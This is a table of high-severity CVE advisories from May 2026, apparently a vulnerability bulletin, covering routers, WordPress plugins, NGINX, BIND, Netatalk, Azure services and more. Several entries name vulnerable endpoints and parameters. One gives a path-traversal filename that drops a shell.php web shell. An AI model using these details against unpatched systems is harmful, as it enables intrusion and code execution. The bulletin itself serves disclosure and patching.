| Edimax--BR-6675nD | A vulnerability was detected in Edimax BR-6675nD 1.12. This vulnerability affects the function formsetPPPoE of the file /goform/formsetPPPoE of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9399 |
| Edimax--BR-6675nD | A vulnerability has been found in Edimax BR-6675nD 1.12. Impacted is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. The manipulation of the argument pppUserName leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9401 |
| Edimax--BR-6675nD | A vulnerability was determined in Edimax BR-6675nD 1.12. The impacted element is the function formWlSiteSurvey of the file /goform/formWlSiteSurvey of the component POST Request Handler. This manipulation of the argument selSSID causes buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9403 |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn up to 1.31. The impacted element is an unknown function of the file /goform/formWpsStart of the component webs. Such manipulation of the argument pinCode/wlan-url leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9344 |
| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn up to 1.31. This affects the function formWizSurvey of the file /goform/formWizSurvey of the component webs. Performing a manipulation of the argument ssid/manualssid/ip/mask/gateway results in buffer overflow. The attack can be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9345 |
| Edimax--EW-7438RPn | A flaw has been found in Edimax EW-7438RPn up to 1.31. This impacts the function formWirelessTbl of the file /goform/formWirelessTbl of the component webs. Executing a manipulation of the argument submit-url can lead to buffer overflow. The attack may be performed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9346 |
| Edimax--EW-7438RPn | A vulnerability was found in Edimax EW-7438RPn up to 1.31. Affected by this vulnerability is an unknown functionality of the file /goform/mp of the component webs. The manipulation of the argument webs results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9348 |
| Edimax--EW-7438RPn | A security flaw has been discovered in Edimax EW-7438RPn 1.28a. Affected by this issue is the function formwlencrypt24g of the file /goform/formwlencrypt24g of the component POST Request Handler. The manipulation of the argument key1 results in buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9360 |
| edmonparker--Read More & Accordion | The Read More & Accordion plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.5.7. This is due to the 'RadMoreAjax::importData' function not restricting which database tables can be written to during import and not properly validating the imported data. This makes it possible for authenticated attackers, with permission granted by the site owner through the plugin's role settings, to insert arbitrary rows into the 'wp_users' and 'wp_usermeta' tables, including the 'wp_capabilities' field, allowing them to create a new administrator account and gain administrator access to the site. | 2026-05-20 | 8.8 | CVE-2026-7467 |
| F5--NGINX JavaScript | NGINX JavaScript has a vulnerability when the js_fetch_proxy directive is configured with at least one client-controlled NGINX variable (for example, $http_*, $arg_*, $cookie_*) and a location invoking the ngx.fetch() operation from NGINX JavaScript. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | 2026-05-19 | 8.1 | CVE-2026-8711 |
| F5--NGINX Plus | NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when a rewrite directive uses a regex pattern with distinct, overlapping Perl-Compatible Regular Expression (PCRE) captures (for example, ^/((.*))$) and a replacement string that references multiple such captures (for example, $1$2) in a redirect or arguments context. An unauthenticated attacker along with conditions beyond their control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | 2026-05-22 | 8.1 | CVE-2026-9256 |
| FunnelKit--Funnel Builder for WooCommerce Checkout | Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin's External Scripts global setting. Attackers can inject malicious JavaScript through the External Scripts setting that executes in the browsers of all checkout page visitors. | 2026-05-19 | 7.5 | CVE-2026-47100 |
| Gmission--Web Fax | Improper input validation, Unrestricted upload of file with dangerous type vulnerability in Gmission Web Fax allows Remote Code Inclusion. This issue affects Web Fax: from 3.0 before 3.1. | 2026-05-21 | 8.4 | CVE-2026-9157 |
| GNU--GNU SASL | In GNU SASL before 2.2.3, DIGEST-MD5 has a NULL pointer dereference affecting both clients and servers, via a known token with no accompanying = character. This occurs in lib/digest-md5/getsubopt.c. | 2026-05-24 | 7.5 | CVE-2026-48829 |
| goauthentik--authentik | authentik is an open-source identity provider. Versions 2025.12.4 and prior, and versions 2026.2.0-rc1 through 2026.2.2 were vulnerable to Authentication Bypass through SAML NameID XML Comment Injection. Due to how authentik extracted the NameID value from a SAML assertion, it was possible for an attacker to trick authentik into only seeing a part of the NameID value, potentially allowing an attacker to gain access to other accounts. This issue could be exploited on an authentik instance with a SAML Source, where the attacker had an account on the SAML Source and the ability to modify their NameID value (commonly username or E-mail), and XML Signing was enabled. The attacker could modify the SAML assertion given to authentik by injecting a comment within the NameID value, which effectively truncated the NameID value to the snippet before the comment, and gave the attacker access to any user account. This issue has been fixed in versions 2025.12.5 and 2026.2.3. | 2026-05-20 | 8.7 | CVE-2026-40165 |
| goauthentik--authentik | authentik is an open-source identity provider. In versions prior to 2025.12.5 and 2026.2.0-rc1 through 2026.2.2, the PATCH /api/v3/core/users/{pk}/ API allows a caller with change_user on a target user to assign arbitrary groups through UserSerializer, including groups with is_superuser=True, without requiring enable_group_superuser, leading to privilege escalation. This bypasses the stricter permission model enforced in group-management paths and enables delegated user-management permissions to escalate target users to administrator-equivalent privilege. Users with permissions to update groups or permissions to update users are able to add themselves or other users they have permissions on to users which have superuser permissions. This issue has been fixed in versions 2025.12.5 and 2026.2.3. | 2026-05-22 | 8.1 | CVE-2026-40172 |
| H3C--Magic B0 | A vulnerability was found in H3C Magic B0 up to 100R002. This affects the function Edit_BasicSSID_5G of the file /goform/aspForm. Performing a manipulation of the argument param results in buffer overflow. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9393 |
| harmistechnology--Ek Rishta | Joomla! Component Ek Rishta 2.10 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cid parameter. Attackers can send GET requests to the user_detail view with malicious cid values containing SQL commands to extract sensitive database information. | 2026-05-23 | 8.2 | CVE-2018-25348 |
| harmistechnology--EkRishta | Joomla! Component EkRishta 2.10 contains an error-based SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code into the username parameter. Attackers can submit POST requests to the login endpoint with SQL injection payloads in the username field to extract database information including user credentials and system details. | 2026-05-23 | 8.2 | CVE-2018-25351 |
| hestiacp--hestiacp | HestiaCP versions 1.9.0 through 1.9.4 contain a deserialization vulnerability in the web terminal component caused by a session format mismatch between PHP and Node.js that allows unauthenticated remote attackers to achieve root-level code execution. Attackers can inject crafted data into HTTP headers that are processed by the PHP session handler but incorrectly deserialized by the Node.js web terminal component as trusted session values, resulting in arbitrary command execution on systems with the web terminal feature enabled. | 2026-05-19 | 10 | CVE-2026-43633 |
| hestiacp--hestiacp | HestiaCP versions 1.2.0 through 1.9.4 contain an IP spoofing vulnerability that allows unauthenticated remote attackers to bypass authentication security controls by supplying an arbitrary IP address in the CF-Connecting-IP HTTP header without verifying the request originated from Cloudflare's network. Attackers can exploit this to circumvent fail2ban brute-force protection, bypass per-user IP allowlists, and poison authentication audit logs by spoofing trusted IP addresses on each request. | 2026-05-19 | 7.5 | CVE-2026-43634 |
| Honeywell International Inc.--Control Network Module (CNM) | Honeywell Control Network Module (CNM) contains a command injection vulnerability in the web interface. An attacker could exploit this vulnerability via command delimiters, potentially resulting in Remote Code Execution (RCE). | 2026-05-21 | 9.1 | CVE-2026-5433 |
| iina--iina | IINA before 1.4.3 contains a user-assisted command execution vulnerability that allows remote attackers to execute arbitrary commands by supplying malicious mpv_-prefixed query parameters through the iina://open custom URL scheme handler. Attackers can deliver a crafted URL via a browser that passes unvalidated mpv_options/input-commands parameters into the mpv runtime, causing arbitrary command execution as the current macOS user upon approval of the browser protocol prompt without requiring a valid media file. | 2026-05-21 | 8.8 | CVE-2026-47114 |
| ISC--BIND 9 | BIND servers that are configured to use TKEY-based authentication via GSS-API tokens are vulnerable to excessive memory consumption when receiving and processing maliciously-constructed packets. Typically these servers will be found in Active Directory integrated DNS deployments and/or Kerberos-secured DNS environments. This issue affects BIND 9 versions 9.0.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.9.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 7.5 | CVE-2026-3039 |
| ISC--BIND 9 | A use-after-free vulnerability exists within the DNS-over-HTTPS implementation. This issue affects BIND 9 versions 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, and 9.20.9-S1 through 9.20.22-S1. BIND 9 versions 9.18.0 through 9.18.48 and 9.18.11-S1 through 9.18.48-S1 are NOT affected. | 2026-05-20 | 7.4 | CVE-2026-3593 |
| ISC--BIND 9 | Multiple flaws have been identified in `named` related to the handling of DNS messages whose CLASS is not Internet (`IN`) - for example, `CHAOS` or `HESIOD`, or DNS messages that specify meta-classes (`ANY` or `NONE`) in the question section. Specially crafted requests reaching the affected code paths - recursion, dynamic updates (`UPDATE`), zone change notifications (`NOTIFY`), or processing of `IN`-specific record types in non-`IN` data - can cause assertion failures in `named`. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 7.5 | CVE-2026-5946 |
| ISC--BIND 9 | Undefined behavior may result due to a race condition leading to a use-after-free violation. If BIND receives an incoming DNS message signed with SIG(0), it begins work to validate that signature. If, during that validation, the "recursive-clients" limit is reached (as would occur during a query flood), and that same DNS message is discarded per the limit, there is a brief window of time while the SIG(0) validation may attempt to read the now-discarded DNS message. This issue affects BIND 9 versions 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, and 9.20.9-S1 through 9.20.22-S1. BIND 9 versions 9.18.28 through 9.18.49 and 9.18.28-S1 through 9.18.49-S1 are NOT affected. | 2026-05-20 | 7.5 | CVE-2026-5947 |
| itsourcecode--Electronic Judging System | A vulnerability has been found in itsourcecode Electronic Judging System 1.0. This affects an unknown part of the file /intrams/admin/login.php. The manipulation of the argument Username leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-05-24 | 7.3 | CVE-2026-9383 |
| ItzCrazyKns--Vane | A flaw has been found in ItzCrazyKns Vane up to 1.12.1. This vulnerability affects unknown code of the file src/app/api/providers/route.ts of the component Model Provider API. This manipulation of the argument baseURL causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-24 | 7.3 | CVE-2026-9372 |
| ivanti--Secure Access Client | An improper certificate validation vulnerability in Ivanti Secure Access Client before 22.8R6 allows a remote unauthenticated attacker to execute arbitrary code. | 2026-05-22 | 8.8 | CVE-2026-8992 |
| jarrodwatts--claude-hud | Claude HUD through 0.0.12, patched in commit 234d9aa, contains a command injection vulnerability that allows local attackers to execute arbitrary commands by manipulating the COMSPEC environment variable. Attackers can set COMSPEC to an arbitrary binary path before claude-hud performs its version check, causing execFile() to execute the attacker-supplied executable with cmd.exe arguments, resulting in arbitrary code execution on Windows systems. | 2026-05-18 | 7.8 | CVE-2026-47092 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. In versions 0.46.2 and below, the handle_compose_command() function in kitty/graphics.c performs bounds validation on composition offsets using unsigned 32-bit arithmetic that is subject to integer wrapping, potentially leading to Heap Buffer Over-Read/Write. An attacker who can write escape sequences to a kitty terminal (e.g., via a malicious file, SSH login banner, or piped content) can supply crafted x_offset/y_offset values that pass the bounds check after wrapping but cause massive out-of-bounds heap memory access in compose_rectangles(). No user interaction is required. No non-default configuration is required. The attacker only needs the ability to produce output in a kitty terminal window. This issue has been fixed in version 0.47.0. | 2026-05-19 | 9.9 | CVE-2026-33642 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. Versions 0.46.2 and below contain a heap buffer overflow in load_image_data() that allows any process which can write to the terminal's stdin to crash kitty immediately. The vulnerability is triggered by a single APC graphics protocol command with a PNG format declaration (f=100) whose payload exceeds twice the initial buffer capacity. The overflow is attacker-controlled in both length and content, causing DoS and potentially escalating to RCE. This issue has been fixed in version 0.47.0. | 2026-05-19 | 7.5 | CVE-2026-33633 |
| langgenius--dify | Dify version 1.14.1 and prior contains an authorization bypass vulnerability that allows authenticated editor users to set and enable trace configurations for any application regardless of tenant ownership. Attackers can exploit missing tenant ownership checks in the trace configuration endpoints to redirect all messages and responses from victim applications to attacker-controlled LLM trace providers. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. | 2026-05-18 | 7.4 | CVE-2026-41947 |
| langgenius--dify | Dify version 1.14.1 and prior contains a path traversal vulnerability that allows authenticated users to manipulate requests forwarded to the Plugin Daemon's internal REST API by exploiting insufficient URL path sanitization. Attackers can traverse out of their authorized tenant path using unencoded dot sequences in task identifiers or manipulated filename parameters to access internal endpoints such as debug interfaces, requiring only knowledge of the victim tenant's UUID. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. | 2026-05-18 | 7.7 | CVE-2026-41948 |
| laurent22--joplin | Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions prior to 3.5.7 contain a path traversal vulnerability in the importer which allows overwriting arbitrary files on disk. The OneNote converter does not sanitize the names of embedded files before writing them to disk. As a result, it's possible for an attacker to create a malicious .one file that includes file names containing ../../, that are then interpreted as part of the target path when extracting attachments from the .one file. This issue has been patched in version 3.5.7. | 2026-05-18 | 8.2 | CVE-2026-22810 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: pcrypt - Fix handling of MAY_BACKLOG requests. MAY_BACKLOG requests can return EBUSY. Handle them by checking for that value and filtering out EINPROGRESS notifications. | 2026-05-19 | 9.8 | CVE-2026-43493 |
| LizardByte--Sunshine | Sunshine is a self-hosted game stream host for Moonlight. In versions prior to 2026.516.143833, the client-certificate authentication can be bypassed because of how OpenSSL verification results are handled. In src/crypto.cpp, the custom verify callback treats X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY, X509_V_ERR_CERT_NOT_YET_VALID, and X509_V_ERR_CERT_HAS_EXPIRED as success. This can allow an untrusted certificate to pass authentication and access protected HTTPS endpoints. This issue has been fixed in version 2026.516.143833. | 2026-05-22 | 9.8 | CVE-2026-32253 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to check the integration URL for path traversal, which allows a malicious authenticated user to call an arbitrary API with the system admin's Mattermost auth token via path traversal in the integration action URL. Mattermost Advisory ID: MMSA-2026-00640 | 2026-05-21 | 8 | CVE-2026-4858 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to sanitize sensitive configuration fields before including them in support packet generation, which allows a Mattermost System Admin or any party with access to a support packet to obtain sensitive credentials in plaintext by downloading a support packet from the System Console. Mattermost Advisory ID: MMSA-2026-00607 | 2026-05-18 | 8.7 | CVE-2026-6346 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to properly validate msgpack-encoded WebSocket frames before memory allocation, which allows an unauthenticated remote attacker to crash the server process and cause a full service outage for all users via a crafted binary WebSocket message sent to the public WebSocket endpoint. Mattermost Advisory ID: MMSA-2026-00647 | 2026-05-22 | 7.5 | CVE-2026-5740 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to sanitize sensitive configuration fields in the Mattermost Calls plugin, which allows an attacker with access to a support packet to obtain TURN server credentials via the plaintext values present in the exported plugin configuration. Mattermost Advisory ID: MMSA-2026-00605 | 2026-05-18 | 7.6 | CVE-2026-6347 |
| MediaArea--MediaInfoLib | MediaArea MediaInfoLib Channel Splitting heap-based buffer overflow vulnerability | 2026-05-20 | 7.8 | CVE-2026-22554 |
| MediaArea--MediaInfoLib | MediaArea MediaInfoLib LXF element parsing heap-based buffer overflow vulnerability | 2026-05-21 | 7.8 | CVE-2026-28764 |
| memcached--memcached | In memcached before 1.6.42, username data for SASL password database authentication has a timing side channel because a loop exits as soon as a valid username is found by sasl_server_userdb_checkpass. | 2026-05-20 | 8.1 | CVE-2026-47783 |
| memcached--memcached | In memcached before 1.6.42, password data for SASL password database authentication has a timing side channel because memcmp is used by sasl_server_userdb_checkpass. | 2026-05-20 | 8.1 | CVE-2026-47784 |
| Mesalvo--Meona Client Launcher Component | Improper Control of Generation of Code ('Code Injection') vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables code execution on other users' systems. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 9 | CVE-2026-22314 |
| Mesalvo--Meona Client Launcher Component | Improper Access Control vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables a normal user to gain access to the admin panel. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 7.8 | CVE-2026-0856 |
| Mesalvo--Meona Client Launcher Component | Incorrect Privilege Assignment vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables the export of user data, including cleartext passwords, via the SQL editor. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 7.2 | CVE-2026-22315 |
| metaphorcreations--Ditty Responsive News Tickers, Sliders, and Lists | The Ditty - Responsive News Tickers, Sliders, and Lists plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.1.65. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to retrieve the full item content of non-public Dittys - including drafts, pending, scheduled, and disabled entries - by enumerating integer post IDs against the ditty_init AJAX endpoint. Unlike the non-AJAX init() counterpart, init_ajax() does not verify that the requested Ditty has a 'publish' post status before loading and returning its items, allowing content that administrators explicitly withheld from public view to be extracted. | 2026-05-22 | 7.5 | CVE-2026-9011 |
| Microsoft--Azure Local | Improper authentication in Azure Local Disconnected Operations allows an unauthorized attacker to elevate privileges over a network. | 2026-05-18 | 10 | CVE-2026-42822 |
| Microsoft--Azure Orbital Spatio | Unrestricted upload of file with dangerous type in Azure Orbital Spatio allows an unauthorized attacker to execute code over a network. | 2026-05-22 | 10 | CVE-2026-40412 |
| Microsoft--Azure Privileged Identity Management (PIM) | Authorization bypass through user-controlled key in Azure Privileged Identity Management (PIM) allows an authorized attacker to elevate privileges over a network. | 2026-05-22 | 8.8 | CVE-2026-35430 |
| Microsoft--Azure Resource Manager | Improper authentication in Azure Resource Manager (ARM) allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 10 | CVE-2026-47280 |
| Microsoft--Azure Stack HCI | Improper input validation in Azure Compute Gallery allows an authorized attacker to disclose information over a network. | 2026-05-22 | 7.7 | CVE-2026-26147 |
| Microsoft--Azure Virtual Network Gateway | Improper input validation in Azure Virtual Network Gateway allows an authorized attacker to execute code over a network. | 2026-05-22 | 9.9 | CVE-2026-40411 |
| Microsoft--Microsoft 365 Copilot for iOS | Improper neutralization of special elements used in a command ('command injection') in Microsoft Copilot allows an unauthorized attacker to perform tampering over a network. | 2026-05-22 | 9.3 | CVE-2026-41090 |
| Microsoft--Microsoft Edge (Chromium-based) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | 2026-05-18 | 8.8 | CVE-2026-45495 |
| Microsoft--Microsoft Entra | Origin validation error in Microsoft Entra ID allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 10 | CVE-2026-42901 |
| Microsoft--Microsoft Entra | Authentication bypass using an alternate path or channel in Microsoft Azure Active Directory B2C allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 9.1 | CVE-2026-33843 |
| Microsoft--Microsoft Global Secure Access (GSA) | Improper privilege management in Azure Entra ID allows an unauthorized attacker to elevate privileges over a network. | 2026-05-22 | 7.5 | CVE-2026-23663 |
| Microsoft--Microsoft Malware Protection Engine | Heap-based buffer overflow in Microsoft Defender allows an unauthorized attacker to execute code over a network. | 2026-05-20 | 8.1 | CVE-2026-45584 |
| Microsoft--Microsoft Malware Protection Engine | Improper link resolution before file access ('link following') in Microsoft Defender allows an authorized attacker to elevate privileges locally. | 2026-05-20 | 7.8 | CVE-2026-41091 |
| Microsoft--Microsoft Planetary Computer Pro (GeoCatalog) | Deserialization of untrusted data in Microsoft Planetary Computer Pro allows an unauthorized attacker to disclose information over a network. | 2026-05-22 | 10 | CVE-2026-41104 |
| Microsoft--Microsoft Power Pages | Improper neutralization of special elements used in a command ('command injection') in Microsoft Power Pages allows an unauthorized attacker to execute code over a network. | 2026-05-22 | 10 | CVE-2026-23652 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-05-22 | 8.8 | CVE-2026-45659 |
| Microsoft--Windows Admin Center in Azure Portal | Improper link resolution before file access ('link following') in Azure Portal Windows Admin Center allows an authorized attacker to elevate privileges locally. | 2026-05-20 | 7.8 | CVE-2026-42834 |
| Motorola--Phones | An improper authentication vulnerability was discovered in the Motorola Factory Test component (com.motorola.motocit). The application contained a reference to a writable file descriptor in external storage which could be used by third party apps running on the device to open a TCP server, exposing sensitive permissions and data. This could allow a local attacker to bypass permission checks and access protected device settings. | 2026-05-19 | 8.4 | CVE-2026-5804 |
| mullvad--mullvadvpn-app | Mullvad VPN is a VPN client app for desktop and mobile. When using macOS with versions 2026.1 and below, Mullvad VPN may allow local privilege escalation during installation or upgrade. The installer package executes binaries from /Applications/Mullvad VPN.app without verifying if the bundle is attacker-controlled or that the path is the legitimate Mullvad application. A user in the admin group can pre-place a crafted application bundle at that location and may be able to achieve code execution as root. Since the issue only affected the installer, there is no immediate need for users to update if they are already running an older version. This issue has been fixed in version 2026.2-beta1. | 2026-05-19 | 7.3 | CVE-2026-32323 |
| n/a--exifreader | This affects versions of the package exifreader before 4.39.0. A crafted image containing an ICC mluc tag can set an attacker-controlled record count together with a zero record size. During parsing, ExifReader repeatedly processes the same record and appends entries to an array without sufficient bounds validation, causing excessive memory growth. In applications that parse attacker-supplied images, this may lead to denial of service through memory exhaustion. | 2026-05-19 | 7.5 | CVE-2026-8813 |
| n/a--lwIP | A vulnerability was found in lwIP up to 2.2.1. Affected is the function snmp_parse_inbound_frame of the file src/apps/snmp/snmp_msg.c of the component snmpv3 USM Handler. Performing a manipulation of the argument msgAuthenticationParameters results in stack-based buffer overflow. The attack may be initiated remotely. The patch is named 0c957ec03054eb6c8205e9c9d1d05d90ada3898c. It is suggested to install a patch to address this issue. | 2026-05-18 | 9.8 | CVE-2026-8836 |
| n/a--shell-quote | shell-quote's `quote()` function did not validate object-token inputs against the operator model used by `parse()`. The `.op` field was backslash-escaped character by character using `/(.)/g`, which in JavaScript does not match line terminators (\n, \r, U+2028, U+2029). A line terminator in `.op` therefore passed through unescaped into the output; POSIX shells treat a literal newline as a command separator, so any content after it would execute as a second command. The vulnerable code path is reachable in two ways: (1) direct construction of `{ op: '...\n...' }` from external input, and (2) via `parse(cmd, envFn)` when `envFn` returns object tokens whose `.op` is attacker-influenced. Both are documented API surface. Fixed by replacing the per-character escape with strict shape validation: `.op` must match the parser's control-operator allowlist; `{ op: 'glob', pattern }` validates `pattern` and forbids line terminators; `{ comment }` validates `comment` and forbids line terminators; any other object shape throws `TypeError`. | 2026-05-22 | 8.1 | CVE-2026-9277 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. Versions 2026 and below contain a critical vulnerability in the Plugins::add() function. The system fails to properly validate the file paths within uploaded ZIP archives. This allows an attacker to perform a Zip Slip attack, leading to Arbitrary File Write and Remote Code Execution (RCE) by overwriting sensitive .php files outside the designated plugins directory. The vulnerability is located in Plugins.php. While the testZipFile function attempts to validate that the ZIP contains only one root folder, it does not sanitize or validate the individual file paths within that folder. An attacker can bypass this check by naming a file ValidPluginName/../../shell.php. The explode function will see ValidPluginName as the root folder, satisfying the count($folders) != 1 check. However, during extraction, the ../../ sequence triggers a path traversal, allowing the file to be written anywhere the web server has write permissions, including the root directory. This issue is fixed in version 2026.1. | 2026-05-18 | 7.2 | CVE-2026-27891 |
| Netatalk--Netatalk | A heap-based buffer overflow in the CNID daemon comm_rcv() function in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code with escalated privileges or cause a denial of service. | 2026-05-21 | 9.9 | CVE-2026-44050 |
| Netatalk--Netatalk | An SQL injection vulnerability in the MySQL CNID backend in Netatalk 3.1.0 through 4.4.2 allows a remote authenticated attacker to obtain unauthorized access to data, modify data, or cause a denial of service. | 2026-05-21 | 8.8 | CVE-2026-44047 |
| Netatalk--Netatalk | A stack-based buffer overflow via UCS-2 type confusion in convert_charset() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service. | 2026-05-21 | 8.8 | CVE-2026-44048 |
| Netatalk--Netatalk | An improper link resolution vulnerability in Netatalk 3.0.2 through 4.4.2 allows a remote authenticated attacker to read arbitrary files or overwrite arbitrary files via attacker-controlled symlink creation. | 2026-05-21 | 8.1 | CVE-2026-44051 |
| Netatalk--Netatalk | An out-of-bounds write due to improper null termination in convert_charset() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service via crafted character data. | 2026-05-21 | 7.5 | CVE-2026-44049 |
| Netatalk--Netatalk | Netatalk 2.1.0 through 4.4.2 inserts LDAP simple-bind passwords into log output in cleartext, which allows an attacker with access to the log files to obtain LDAP credentials. | 2026-05-21 | 7.5 | CVE-2026-44052 |
| Netatalk--Netatalk | Netatalk 1.5.0 through 4.2.2 uses a broken cryptographic algorithm in the DHCAST128 UAM, which allows a remote attacker to obtain authentication credentials or impersonate a user via cryptanalytic attack. | 2026-05-21 | 7.4 | CVE-2026-44053 |
| Netatalk--Netatalk | A logic error involving bitwise OR operations in Netatalk 3.1.4 through 4.4.2 allows a remote authenticated attacker to inject OS commands and execute arbitrary code. | 2026-05-21 | 7.5 | CVE-2026-44055 |
| Netatalk--Netatalk | An integer underflow in dsi_writeinit() in Netatalk 1.5.0 through 4.4.2 allows a remote unauthenticated attacker to cause a denial of service via a crafted DSI write request. | 2026-05-21 | 7.5 | CVE-2026-44060 |
| Netatalk--Netatalk | A missing output length bounds check in pull_charset_flags() in Netatalk 2.0.4 through 4.4.2 allows a remote authenticated attacker to execute arbitrary code or cause a denial of service via crafted character set data. | 2026-05-21 | 7.5 | CVE-2026-44062 |
| Netatalk--Netatalk | An out-of-bounds read in ASP session ID handling in Netatalk 1.3 through 4.4.2 allows an adjacent network attacker to obtain limited information or cause a denial of service via a crafted ASP request. | 2026-05-21 | 7.1 | CVE-2026-44064 |
| Netatalk--Netatalk | Multiple heap out-of-bounds reads in the Spotlight RPC unmarshalling code in Netatalk 3.1.0 through 4.4.2 allow a remote authenticated attacker to obtain sensitive information or cause a minor service disruption. | 2026-05-21 | 7.1 | CVE-2026-44066 |
| Netatalk--Netatalk | Incomplete sanitization of extended attribute (EA) path components in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to write to files outside the intended metadata namespace via crafted EA names. | 2026-05-21 | 7.6 | CVE-2026-44068 |
